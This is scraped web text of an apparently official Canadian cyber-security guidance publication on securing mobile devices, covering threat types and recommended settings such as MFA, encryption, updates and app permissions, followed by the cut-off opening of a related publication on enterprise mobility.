confidential business information, client and employee data, and other proprietary information and amplify the severity of a breach.</p> <p>This publication outlines the fundamental best practices for securing mobile devices, with the objective of preserving the integrity of sensitive information and protecting users and organizations from potential breaches.</p> <details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#Intro">1. Introduction</a> <ul><li><a href="#Mobile-security">1.1 Importance of mobile device security</a></li> <li><a href="#Types-threats">1.2 Types of mobile security threats</a></li> </ul></li> <li><a href="#Best-practices">2. Mobile device security best practices</a> <ul><li><a href="#Security-configuration">2.1 Mobile device security configuration recommendations</a></li> <li><a href="#Additional-practices">2.2 Additional best practices and tips to secure your mobile device</a></li> <li><a href="#Additional-ressources">2.3 Additional resources on mobile security</a></li> </ul></li> <li><a href="#Summary">3. Summary</a></li> </ul></details></section><section><h2 class="text-info" id="Intro">1 Introduction</h2> <p>With the increasing reliance on mobile devices for both personal and professional use, it is crucial for organizations to ensure the security of mobile devices. Mobile device security involves implementing measures and practices to defend against a variety of threats, including privacy breaches and unauthorized access to sensitive data. Mobile device security also includes a range of strategies and technologies aimed at ensuring the confidentiality, integrity and availability of information stored on mobile devices.</p> <h3 id="Mobile-security">1.1 Importance of mobile device security</h3> <p>Mobile device security is critical for organizations due to their widespread use, where employees often access work-related data and correspondence. These devices are vulnerable to various security threats such as malware, data breaches and unauthorized access. Many organizations have specific compliance and legal requirements for protecting client and employee information.</p> <p>Failure to secure mobile devices can result in legal consequences and reputational damage. Implementing proper mobile security measures is an important step in preventing data breaches, safeguarding sensitive corporate information, and protecting client and employee data. A security breach on a mobile device could result in substantial financial implications associated with data recovery and legal implications. Mobile security measures are also crucial for compliance and for maintaining trust, credibility and the overall integrity of your organization.</p> <p>The following publications from the Cyber Centre encompass a range of strategies, guidelines and best practices for enhancing mobile security measures within organizational frameworks:</p> <ul><li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="a8b8b4c0-568c-4225-9ba3-9f4e546a6204" href="/en/guidance/device-security-travel-and-telework-abroad-itsap00188">Device security for travel and telework abroad (ITSAP.00.188)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="130c4aab-5f74-49f0-beb1-b2c3edaf6c33" href="/en/guidance/mobile-device-guidance-high-profile-travellers-itsap-00088">Mobile device guidance for high profile travellers (ITSAP.00.088)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="c9cbfaae-471a-4c9b-a691-67c9f13eb776" href="/en/guidance/mobile-devices-and-business-travellers-itsap00087">Mobile devices and business travellers (ITSAP.00.087)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="7aa3f54a-1d31-4a82-aa41-93dec6e4dc73" href="/en/guidance/security-considerations-mobile-device-deployments-itsap70002">Security considerations for mobile device deployments (ITSAP.70.002)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/securing-enterprise-mobility-itsm80001">Securing the enterprise for mobility (ITSM.80.001)</a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <div class="clearfix">Ā </div> <h3 id="Types-threats">1.2 Types of mobile security threats</h3> <p>Understanding the various types of threats is essential for protecting both your devices and the valuable data they store.</p> <p>The threat landscape for mobile devices is multifaceted and encompasses:</p> <ul><li>malicious applications (apps)</li> <li>network-level vulnerabilities</li> <li>exploits that target weaknesses within both the device and the mobile operating system (OS)</li> </ul><p>The following section provides an overview of common threat vectors.</p> <h4>1.2.1 Malicious applications and malware</h4> <p>When downloading and using applications, you may inadvertently download malware and infect your mobile device and, possibly, the environment to which they connect. Even apps downloaded from mobile device app stores, can pose a threat by disguising themselves as legitimate. They can perform malicious functions, such as gaining remote access, intercepting text messages, compromising sensitive data or taking control of the device. Trojans are among the most common threats. This type of malware disguises itself as legitimate code or software and is frequently involved in ad and click scams.</p> <p>Threat actors use malware loaders to inject malicious code into seemingly secure applications, slipping through initial security measures before they are detected and removed. Once a mobile device is compromised, these applications can execute various invasive actions, such as activating key loggers, accessing the camera and audio functions, and obtaining extensive permissions on your device.</p> <p>Besides trojans, threat actors may target mobile devices using diverse malware threats, including:</p> <ul><li>mobile ransomware that encrypts data for a ransom</li> <li>mobile phishing or smishing using deceptive links</li> <li>voice phishing (vishing) through phone calls</li> <li>spyware that secretly monitors user activities</li> <li>adware that displays intrusive ads</li> </ul><p>These threats exploit vulnerabilities, use social engineering and compromise user privacy.</p> <h4 id="1.2.2">1.2.2 Browser-based malware</h4> <p>Browser-based malware is malicious software that exploits vulnerabilities in web browsers, using web technologies to compromise the mobile device. Unlike apps downloaded from official app stores, which undergo malware scans and inspections, browser scripts execute arbitrary code sent by remote servers without prior vetting or inspection. This makes browser attacks highly effective. Even though modern browsers implement security measures such as sandboxing to mitigate the impact of browser exploits, existing vulnerabilities may still allow the malware to evade these measures and potentially compromise the mobile device. A subset of this threat involves "web apps" that can be downloaded from application stores. These web apps can be downloaded from a mobile app store, contain minimal code downloaded to the mobile device, and run on a web browser via a custom user interface. The code opens an instance of the system browser and displays a custom web page that may initially pass vetting because the benign content is provided remotely, but later switch to delivering malicious content.</p> <h4 id="1.2.3">1.2.3 Network attacks</h4> <p>Network attacks targeting mobile devices present an array of cyber threats that exploit vulnerabilities in communication channels. These attacks can take various forms, such as adversary-in-the-middle (AitM) attacks and Wi-Fi eavesdropping, each of which pose distinct risks.</p> <h4 id="1.2.4">1.2.4 Adversary-in-the-middle attacks</h4> <p>In <abbr title="adversary-in-the-middle">AitM</abbr> attacks, threat actors intercept the information exchange between 2 parties without their knowledge. This can occur in various ways, including online transactions, email communication or data transfers over networks. Threat actors engage in these attacks to manipulate information, steal data or introduce malicious software.</p> <p>Mobile devices are particularly susceptible to <abbr title="adversary-in-the-middle">AitM</abbr> attacks, as opposed to web traffic which commonly employs encrypted HTTPS for secure communication. You can often determine if a website is secure by looking for the lock symbol within the address bar, which provides additional information about the site’s security. Conversely, text messages (SMS) and many mobile apps used for voice and text communication often lack encryption, making them susceptible to interception.</p> <h4 id="1.2.5">1.2.5 WiāFi eavesdropping and spoofing</h4> <p>Wi-Fi eavesdropping occurs when threat actors intercept Wi-Fi traffic, especially on a public unsecured Wi-Fi network. This can potentially result in data theft, unauthorized access or the installation of malicious software. Mobile devices connecting to open Wi-Fi networks are particularly susceptible to these intrusions.</p> <p>Wi-Fi protection access 3 (WPA3) represents the current standard for Wi-Fi security, addressing some shortcomings of the previous version, Wi-Fi protection access 2 (WPA2). While <abbr title=" Wi-Fi protection access 2">WPA2</abbr> remains generally suitable for most use cases, it lacks protection against de-authentication attacksā a type of cyber attack on wireless networks. In a de-authentication attack, threat actors force devices on a Wi-Fi network to disconnect. This disconnection can then be exploited to force the device to reconnect, allowing the threat actor to observe the initial connection. If someone with the network password observes this initial connection, they can decrypt the <abbr title=" Wi-Fi protection access 2">WPA2</abbr> protection, exposing all transmitted data. This vulnerability may enable threat actors to gain unauthorized access to the device or exploit opportunities for malicious activities.</p> <p>Both <abbr title=" Wi-Fi protection access 2">WPA2</abbr> and <abbr title="Wi-Fi protection access 3">WPA3</abbr> are vulnerable to spoofing attacks. Such attacks occur when someone with the network password creates a spoofed network impersonating the real access point and gains access to the traffic being transmitted over the network. You can mitigate this risk by configuring <abbr title="Wi-Fi protection access 3">WPA3</abbr> to use the Simultaneous Authentication of Equals protocol with Public Key Cryptography (SAE-PK). In this configuration, even if a threat actor has the network password, they will still need the corresponding private key to successfully authenticate. Unfortunately, this capability has not yet been widely adopted, and many access points still operate with weaker defaults.</p> <h4 id="1.2.6">1.2.6 Advanced jailbreaking and rooting techniques</h4> <p>Users who want more privileges for greater control over their devices may use jailbreaking and rooting techniques. This involves removing software restrictions imposed by the operating system to gain higher privileges, essentially allowing users to access and modify parts of the device’s file system that would otherwise be restricted. This process allows users to remove unwanted default applications or install applications from unofficial stores.</p> <p>In essence, while jailbreaking and rooting may offer users increased customization and control, it exposes devices to heightened security risks. If users do not implement strong alternate security controls, threat actors may exploit these vulnerabilities to access more data and inflict greater damage than they would if users keep the default operating system permissions.</p> <h4 id="1.2.7">1.2.7 Multiāfactor authentication bypass attacks</h4> <p>Multi-factor authentication (MFA) typically involves the use of multiple verification methods to enhance the protection of sensitive data and systems. These can include one-time passwords, digital tokens or biometric authentication.</p> <p><abbr title="Multi-factor authentication">MFA</abbr> bypass attacks encompass a range of tactics employed by threat actors to evade the additional layers of security implemented by <abbr title="Multi-factor authentication">MFA</abbr> systems. This includes voice phishing, or "vishing", a form of social engineering where threat actors employ phone calls to trick you in divulging <abbr title="Multi-factor authentication">MFA</abbr> codes or sensitive details like personal information or financial data. In contrast with traditional phishing through emails, vishing relies on manipulating individuals through voice communication. Criminals often use caller ID spoofing and voice-changing programs to create convincing pre-recorded messages.</p> <p>Additionally, <abbr title="Multi-factor authentication">MFA</abbr> bypass attacks may:</p> <ul><li>exploit flaws in the implementation of one-time passwords</li> <li>intercept or manipulate communication channels</li> <li>compromise biometric authentication systems</li> <li>leverage social engineering techniques to trick users into revealing their authentication credentials</li> </ul><p>Another <abbr title="Multi-factor authentication">MFA</abbr> security threat to be aware of is the <abbr title="Multi-factor authentication">MFA</abbr> fatigue attack, also known as <abbr title="Multi-factor authentication">MFA</abbr> bombing or <abbr title="Multi-factor authentication">MFA</abbr> spamming. In this social engineering cyber attack, threat actors overwhelm the target with numerous <abbr title="Multi-factor authentication">MFA</abbr> requests until that person approves the login attempt. The goal is to pressure the victim into confirming their identity through the notifications, providing an opportunity for attackers to gain unauthorized access to the victim’s account or device.</p> </section><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <div class="clearfix">Ā </div> <section><h2 class="text-info" id="Best-practices">2 Mobile device security best practices</h2> <p>Securing data on mobile devices is crucial to protecting your personal information and your organizationās sensitive data. Mobile devices are attractive targets for threat actors due to the amount of personal and potentially sensitive information they contain. A compromised mobile device has the potential to allow unauthorized access to your organizationās network, placing not only your own information at risk, but also that of your organization.</p> <p>The following section provides guidance on mobile device security configurations and best practices users and organizations can implement to enhance their security posture.</p> <h4 id="Security-configuration">2.1 Mobile device security configuration recommendations</h4> <p>This section describes the various configuration features available on mobile devices and provides insights into how users can selectively activate or deactivate them to maximize the security of their devices.</p> <h4 id="2.1.1">2.1.1 Enable multiāfactor authentication</h4> <p>One of the most effective ways of securing your mobile device involves implementing strong passwords and multi-factor authentication, preferably phishing-resistant <abbr title="Multi-factor authentication">MFA</abbr>, in the login process. While enabling <abbr title="Multi-factor authentication">MFA</abbr> on your mobile device may include receiving an <abbr title="text messages">SMS</abbr> with a code on your phone, it’s important to note that <abbr title="text messages">SMS</abbr> text codes are not considered a strong second authentication method because they can be intercepted and potentially compromised by malicious software on the device. Opting for more secure <abbr title="Multi-factor authentication">MFA</abbr> alternatives, like authenticator apps, passkeys, hardware tokens, near-field communication, or biometrics such as fingerprint, face or retina scans, is a better approach to authentication.</p> <p>Introducing this additional step in the login process enhances security by providing an extra layer of protection. It makes it more challenging for threat actors to access your account, even if they are aware of your password.</p> <p>It’s crucial to avoid using identical passwords across multiple accounts. Choosing unique ones and regularly updating them will enhance security. To mitigate potential risks, particularly in the event of device loss, refrain from storing passwords in browsers or writing them down and storing the paper in your device case.</p> <p>For more on passwords, passphrases and <abbr title="Multi-factor authentication">MFA</abbr> refer to:</p> <ul><li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="32369248-5885-44f2-9af9-d4a80bb9c8b6" href="/en/guidance/best-practices-passphrases-and-passwords-itsap30032">Best practices for passphrases and passwords (ITSAP.30.032)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="df4d897c-c726-4e48-8901-408ba2bdf6d3" href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP.30.030)</a></li> </ul><h4 id="2.1.2">2.1.2 Use the builtāin virtual private network</h4> <p>In instances where using public Wi-Fi is unavoidable, consider implementing extra security measures, such as using your mobile deviceās built-in virtual private network (VPN) to encrypt Internet activity. This provides an additional layer of protection to data transmission and helps shield against potential threats on public networks. Understand, however, that while using a <abbr title="built-in virtual private network">VPN</abbr> is beneficial, it may not offer foolproof cyber security when accessing public Internet. Avoid using third-party <abbr title="built-in virtual private network">VPN</abbr> services as they may introduce security vulnerabilities that can compromise user privacy and overall network security. By avoiding third-party <abbr title="built-in virtual private network">VPN</abbr>s, you reduce the risk associated with trusting external providers with your network traffic and data.</p> <h4 id="2.1.3">2.1.3 Use encryption</h4> <p>Enable the built-in encryption feature on your mobile device to protect stored data from unauthorized access. This security measure encrypts your data, ensuring it is accessible only to authorized users. By using the built-in encryption feature, you can protect your device against potential compromise and unauthorized access, especially in situations like theft.</p> <h4 id="2.1.4">2.1.4 Update devices and applications regularly</h4> <p>To prevent threat actors from accessing your devices and exploiting vulnerabilities in software and apps, you should turn on automatic updates and periodically check for manual updates to ensure both the OS and installed applications are current. OS and app updates typically include security patches and fixes that address known vulnerabilities. Implementing these updates not only improves functionality and performance but also minimizes the risk of data loss due to crashes or errors. If you fail to enforce software updates or neglect application patches, you can create opportunities for threat actors, who closely monitor software vulnerabilities, to breach your network.</p> <p>Consult <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="639ede31-0d64-45cb-9688-664b3ee445cb" href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a> for more information on the advantages of keeping your OS and applications up to date.</p> <h4 id="2.1.5">2.1.5 Turn on screen lock</h4> <p>Given the susceptibility of laptops and smartphones to loss or theft, especially in public spaces, it is important to ensure that the device has a screen lock. Screen lock serves as a layer of defence, requiring authentication such as a PIN, password or biometric to access the device and its contents. This not only safeguards personal and sensitive data, but also helps prevent unauthorized use of the device, reinforcing overall device security.</p> <h4 id="2.1.6">2.1.6 Exercise caution when granting permission</h4> <p>Exercise caution when granting permissions to mobile applications and evaluate whether the permissions align with the appās intended functionality. Regularly review and manage app permissions to restrict unnecessary access to sensitive data. Only allow the minimum necessary access for the app to perform its designated functions. Avoid granting permissions that seem unrelated to the appās actual purpose, especially to things such as location, camera and microphone. Unnecessary access to sensitive information may pose privacy and security risks.</p> <p>Thoroughly evaluate terms, conditions and privacy statements, as data collection under these terms is considered legitimate across all mobile platforms. Users and enterprises should not rely on anonymization mechanisms as foolproof ways of preventing data leaks or safeguarding user identity. Any information that an application gains permission to access should be considered beyond enterprise control and already disclosed.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <div class="clearfix">Ā </div> <h4 id="2.1.7">2.1.7 Deactivate and turn off automatic connections</h4> <p>To reduce the risk of potential security threats, you should deactivate Bluetooth and Wi-Fi when you are not actively using them. By doing so, you can minimize your exposure and reduce the attack vectors and access points that threat actors may exploit.</p> <p>When using Bluetooth, enable the "ask before connecting" option to prevent automatic connections. Bluetooth-enabled devices, while convenient, are susceptible to various mobile security threats, such as compromised privacy and gaining access to encompassing contact lists, personal information, credentials, email, and message content. The following are some of the risks you may incur when you enable Bluetooth on a mobile device:</p> <ul><li>unauthorized device control</li> <li>disruptions in functionality</li> <li>eavesdropping on audio connections</li> <li>compromise of smart locks and security devices used to protect facilities and vehicles</li> <li>spoofing attacks leading to nuisance and denial of service</li> <li>injection of malicious commands and data</li> </ul><p>Deactivating automatic connection to public Wi-Fi enhances overall security by preventing unauthorized access, minimizing the risk of cyber attacks and preserving user privacy. It allows users to make conscious and informed choices when connecting to networks, reducing vulnerability to potential security threats associated with public Wi-Fi environments.</p> <p>Deactivating Bluetooth and Wi-Fi requires intentional effort, emphasizing the importance of ongoing awareness and active management of these features.</p> <h4 id="2.1.8">2.1.8 Turn off location tracking</h4> <p>Location tracking on a mobile device is a feature used to monitor and record your geographic location. You can control and manage location settings through your device’s system preferences or settings menu. While enabling location tracking can enhance the functionality of services, such as mapping, navigation and location-basned applications, it’s important to note that when this feature is active, the device constantly collects and stores location data. This may pose a potential risk if accessed by unauthorized individuals. To safeguard your privacy, you should deactivate location tracking settings when they are not needed.</p> <p>It’s worth noting that in the latest OS releases, many devices offer the option to choose between precise or approximate location tracking. While approximate location tracking may offer a degree of privacy, not all applications may function correctly with this option selected. Even when approximate location tracking does work, it should not be solely relied upon, particularly when the location data of an individual is considered sensitive.</p> <h4 id="2.1.9">2.1.9 Turn off autofill</h4> <p>The password autofill feature is found in most browsers and password managers and is used to automatically populate login credentials on websites and applications. Threat actors can hide behind compromised websites and gain access to saved passwords and personal information stored in autofill, leaving users vulnerable to identity theft and other forms of cyber attacks. You can prevent this by disabling this feature on your device.</p> <h4 id="2.1.10">2.1.10 Keep wireless connection on hidden mode</h4> <p>When your wireless connection is in hidden mode, it adds an additional layer of privacy and security because others won’t see your network listed when scanning for available Wi-Fi networks. In general, keep your wireless connection on hidden mode unless you specifically need to be visible to others.</p> <h4 id="2.1.11">2.1.11 Turn off USB debugging</h4> <p>To prevent unauthorized access to your device via USB connections, turn off USB debugging when not needed. USB debugging is a feature that allows your device to communicate with a computer via a USB connection. Keeping USB debugging activated when it is not actively in use can create a potential entry point for threat actors to exploit vulnerabilities and gain unauthorized control of your device.</p> <h4 id="2.1.12">2.1.12 Configure browser settings</h4> <p>You can enhance your browsing security by configuring browser settings to block pop-ups, activate the do not track feature and manage cookies. Cookies, which can store login information, may be compromised if accessed by threat actors. You should regularly update your browser to the latest version to address potential vulnerabilities and always exercise caution when navigating the web.</p> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h3 id="Additional-practices">2.2 Additional best practices</h3> <p>The following are additional tips you should consider when using your mobile devices. These are not mobile configuration suggestions but rather overall best practices that can help improve the security of your mobile devices and safeguard your privacy.</p> <h4 id="2.2.1">2.2.1 Use password managers</h4> <p>Managing numerous passwords can be tedious, frustrating, and often leads to difficulty in remembering them. As previously mentioned, we recommend turning off the password autofill feature on your device. Additionally, it is important to avoid storing credentials in unprotected apps. Instead, adopt the use of a password manager ā a secure repository for all your passwords, protected by an exclusive "primary" password accessible only to you. This not only simplifies password management, but it also helps generate strong passwords, mitigating the risk associated with creating predictable ones. To further enhance your mobile password security, consider integrating a password manager with an <abbr title="Multi-factor authentication">MFA</abbr> application.</p> <p>Consult <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="b417de95-576e-44d9-b445-1cd620a7deba" href="/en/guidance/password-managers-security-itsap30025">Password managers: Security tips (ITSAP.30.025)</a> for guidance on using a password manager.</p> <h4 id="2.2.2">2.2.2 Back up your data</h4> <p>If your mobile device is compromised or if it falls into the wrong hands, you risk losing all data, including contacts and photos. Having a cloud-based solution that automatically performs backups not only ensures data recovery but also enhances overall information security and facilitates retrieval in the event of a compromise. Automating backups makes it convenient, allowing backups during periods of low phone usage. While an automated cloud backup is generally suitable for personal data, you should verify this featureās compatibility with enterprise cloud data service policies (for example, on retention, data residency or encryption) before enabling it for enterprise data.</p> <p>It’s important to know that remote backups are vulnerable to potential threats. To help mitigate these risks, you should incorporate encryption practices into the backup process. This can be achieved by choosing secure backup solutions with built-in encryption features, ensuring end-to-end encryption for data security during transmission and storage. Prioritizing client-side encryption adds an extra layer of protection by encrypting data on the user’s device before transmitting it to the remote backup server. This approach ensures that even in the event of server compromise, the encrypted data stored in the cloud remains indecipherable without the corresponding decryption key.</p> <h4 id="2.2.3">2.2.3 Use preventative security tools</h4> <p>When you download compromised apps or files on your mobile device, you risk downloading malware. Once malware is activated, threat actors can exploit it to compromise your data, thereby putting your security and privacy at risk. To mitigate this risk, make sure your device is equipped with up-to-date and reputable preventative security tools. These tools include antivirus software, firewalls, and intrusion detection and prevention systems. Certain antivirus applications offer additional features, such as:</p> <ul><li>wiping data in case of a lost device</li> <li>tracking and blocking suspicious callers</li> <li>identifying unsafe applications</li> <li>clearing browsing history</li> <li>deleting cookies</li> </ul><p>Firewalls should be activated whenever possible to enhance the protection of your device. Incorporating intrusion detection and prevention systems into mobile security practices can help you detect, respond to, and mitigate advanced threats that may bypass firewalls. This can strengthen the overall security posture of your mobile ecosystems.</p> <h4 id="2.2.4">2.2.4 Beware of untrustworthy applications</h4> <p>It is important to exercise caution when installing or using apps and to avoid those deemed untrustworthy. Be vigilant and selective about the apps you choose to install or to which you grant permissions. This can help minimize potential risks to your device and personal data. You should download mobile applications exclusively from official application marketplaces or app stores. However, you should not solely rely on application store vetting or approval, as many applications may collect significant data and pose a threat due to the scope and breadth of data collected.</p> <p>Be aware that some applications could disguise themselves as web applications where the content is remotely delivered as a web page. As previously mentioned, the remote content delivered at the time of vetting could be totally benign but can later change to malicious web content containing a browser-based exploit.</p> <p>We recommend that, before you include any application in an enterprise app store, you should use third-party vetting services and app reputation services and conduct an internal app inspection.</p> <h4 id="2.2.5">2.2.5 Log out</h4> <p>Regularly check your device’s accounts and log out from unused accounts. Make it a habit to log out from mobile applications every time you have finished using them. In addition to logging out of your applications, you should power down your mobile device and turn it back on a weekly basis as an additional mitigation against some cyber attacks, like spear phishing and zero-click exploits.</p> <h4 id="2.2.6">2.2.6 Do not leave devices unattended</h4> <p>Leaving mobile devices unattended increases the risk of unauthorized access and theft, potentially compromising sensitive data. It’s important to always keep mobile devices with you or store them securely when not in use to mitigate these risks effectively.</p> <h4 id="2.2.7">2.2.7 Avoid public charging stations</h4> <p>If possible, you should avoid charging your mobile devices in public charging ports or stations. They can be a possible vector for threat actors to gain access to your device. If you have to charge your device using a public port, consider using a USB data blocker to block and prevent data being transferred from your device when you plug it into a charging port.</p> <h4 id="2.2.8">2.2.8 Avoid bypassing security features</h4> <p>Manufacturers incorporate security restrictions and features on their devices to protect users’ devices and data. As mentioned earlier, bypassing security features (known as jailbreaking or rooting) removes these features. If you do not intend to implement strong alternate security controls, avoid bypassing these manufacturer security features, as doing so may expose the device to increased vulnerability to malware and other security threats.</p> <h4 id="2.2.9">2.2.9 Erase your device before disposing of it</h4> <p>Erasing your device before disposal is a critical step to protect sensitive data from unauthorized access. This involves securely wiping or deleting all data to prevent privacy and security risks such as identity theft or financial fraud. Proper data erasure methods include performing a factory reset, using specialized software or physically destroying the device.</p> <h4 id="2.2.10">2.2.10 Ignore unsolicited emails</h4> <p>Threat actors often send fraudulent emails, aiming to replicate legitimate sources and trick individuals into revealing personal information. This tactic is widely known as phishing. Avoid clicking on any links embedded in emails, as threat actors can create fake links that may compromise your security.</p> <p>Similarly, threat actors use <abbr title="text messages">SMS</abbr> in a tactic called smishing to lure victims into sharing personal or financial information, clicking on malicious links, or downloading harmful software or applications. To avoid falling victim to smishing, refrain from clicking on any links in unsolicited messages. Instead, if you’re uncertain about the legitimacy of a message, verify the information directly through official sources like company websites, portals, listed phone numbers or official apps.</p> <p>For additional guidance, refer to:</p> <ul><li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="b5039fc1-841e-42e0-9af9-b93be7d75241" href="/en/guidance/spotting-malicious-email-messages-itsap00100">Spotting malicious email messages (ITSAP.00.100)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8d072457-288e-4bd1-a076-da037de9ad03" href="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks">Don’t take the bait: Recognize and avoid phishing attacks (ITSAP.00.101)</a></li> </ul><h4 id="2.2.11">2.2.11 Use secure network connections</h4> <p>When possible, use public secure networks as they are safer than public insecure networks. Insecure networks can be accessed without passwords and authentication, making them accessible without the need for security encryption keys. This vulnerability exposes them to various security risks, such as malware attacks, denial-of-service attacks and <abbr title="adversary-in-the-middle">AitM</abbr> attacks.</p> <p>As previously mentioned, connecting your mobile device to public Wi-Fi exposes you to potential eavesdropping by malicious actors, jeopardizing sensitive information like credit card numbers, bank account details, passwords and other private data. To mitigate these risks, activate <abbr title="Wi-Fi protection access 3">WPA3</abbr> or preferably <abbr title="Wi-Fi protection access 3">WPA3</abbr> with <abbr title="Simultaneous Authentication of Equals protocol with Public Key Cryptography">SAE-PK</abbr> when possible. Additionally, using your mobile device’s built-in <abbr title="built-in virtual private network">VPN</abbr> adds an extra layer of protection by encrypting Internet activity.</p> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h3 id="Additional-ressources">2.3 Additional resources on mobile security</h3> </section><section><p>For more information on mobile security best practices, refer to the Cyber Centreās publication <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="38a1fb42-00d7-4f06-89ad-c73fa0e72ce9" href="/en/guidance/using-your-mobile-device-securely-itsap00001">Using your mobile device securely (ITSAP.00.001)</a>. Additionally, the Cybersecurity and Infrastructure Security Agencyās <a href="https://www.cisa.gov/sites/default/files/publications/Mobile%20Device%20Adoption%20Best%20Practices%20Guide-508%20compliant%20041316%20FINAL.pdf">Mobile device adoption best practices (PDF)</a> offers best practices for mobile device users to implement alongside the policies already established within their organizations.</p> <h2 class="text-info" id="Summary">3 Summary</h2> <p>Maintaining good security practices for mobile devices is imperative to mitigate the growing risks of data breaches and unauthorized access. The importance of protecting sensitive data on smartphones, tablets and other mobile devices is highlighted by the evolving threats posed by threat actors seeking to gain unauthorized access and compromise privacy.</p> <p>The best practices outlined in this publication aim to strengthen the security posture of mobile devices. Combining technical measures with user habits creates a comprehensive approach to mobile security and can help maintain the confidentiality, integrity and availability of information. By adhering to these guidelines, you can significantly minimize the threats to your mobile devices and better safeguard your personal information and that of your organization.</p> </section><section><h3>Effective date</h3> <p>This publication takes effect on May 4, 2026.</p> <p>This is an UNCLASSIFIED publication that has been issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre). For more information, email or phone our Contact Centre:</p> <p><span class="glyphicon glyphicon-envelope"></span><span class="wb-inv">email</span> <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>Ā |<span class="glyphicon glyphicon-phone"></span><span class="wb-inv">Mobile</span> <a href="tel:613-949-7048">613-949-7048</a> or <a href="tel:+1-833-292-3788">1<span>ā</span>833<span>ā</span>CYBER<span>ā</span>88</a></p> <h3>Revision history</h3> <ol class="lst-spcd"><li>First release: May 6, 2026</li> </ol></section></div> </div> </div> </div> </div> </div> </div> </article>
- Securing the enterprise for mobility (ITSM.80.001)by Canadian Centre for Cyber Security on May 7, 2026 at 2:06 pm
<article data-history-node-id="7662" about="/en/guidance/securing-enterprise-mobility-itsm80001" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><!–ENGLISH Intro paragraph plus pdf download–> <div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>May 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.80.001</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>May 2026Ā |Ā Management series</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <p>This publication provides an overview of enterprise mobility security and lists some of the threats and risks that mobile devices can pose to your organization. It outlines mitigation strategies and safeguards your organization can implement. Lastly, it describes the benefits and features of mobile management solution tools for organizations with more complex information technology (IT) infrastructures.</p> <p>It is important to note that these recommendations are not comprehensive. Furthermore, even if all possible mitigation strategies are properly implemented, a residual risk to your organizationās network and information assets remains.</p> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul><li><a href="#intro">1 Introduction</a></li> <li><a href="#EM-buisness">2 Enterprise mobility business drivers</a></li> <li><a href="#EM-overview">3 Enterprise mobility overview</a> <ul><li><a href="#Mobile">3.1 Mobile devices</a></li> <li><a href="#Wireless-comms">3.2 Wireless communication networks</a></li> <li><a href="#Enterprise-infra">3.3 Enterprise infrastructure</a></li> <li><a href="#Services-app">3.4 Service and applications</a></li> </ul></li> <li><a href="#Mobile-security-vul">4 Mobile device security vulnerabilities</a> <ul><li><a href="#Vulnerability-exploit">4.1 How threat actors exploit these vulnerabilities</a></li> </ul></li> <li><a href="#Threat-risks">5 Threats and risks to the enterprise</a> <ul><li><a href="#Credential-authentification">5.1 Loss of authentication credentials</a></li> <li><a href="#Improper-disposal">5.2 Improper disposal of old mobile devices with sensitive configurations and data</a></li> <li><a href="#Improper-social">5.3 Improper use of social media applications</a></li> <li><a href="#Exploit-devices">5.4 Exploitation of lost or stolen devices</a></li> <li><a href="#Tracking-behaviour">5.5 Threat actors tracking employee behaviour</a></li> <li><a href="#priviledge-misuse">5.6 Authorized equipment users attempting to misuse their privileges</a></li> <li><a href="#untrust-app">5.7 Untrusted app stores</a></li> </ul></li> <li><a href="#Migitation-strat">6 Mitigation strategies</a> <ul><li><a href="#mobile-security-policy">6.1 Implement a mobile device security policy</a></li> <li><a href="#policy-byod">6.2 Implement a policy and user agreements for bring-your-own-device deployments</a></li> <li><a href="#employee-training">6.3 Establish and implement employee training and awareness programs</a></li> <li><a href="#risk-assessments-mobile">6.4 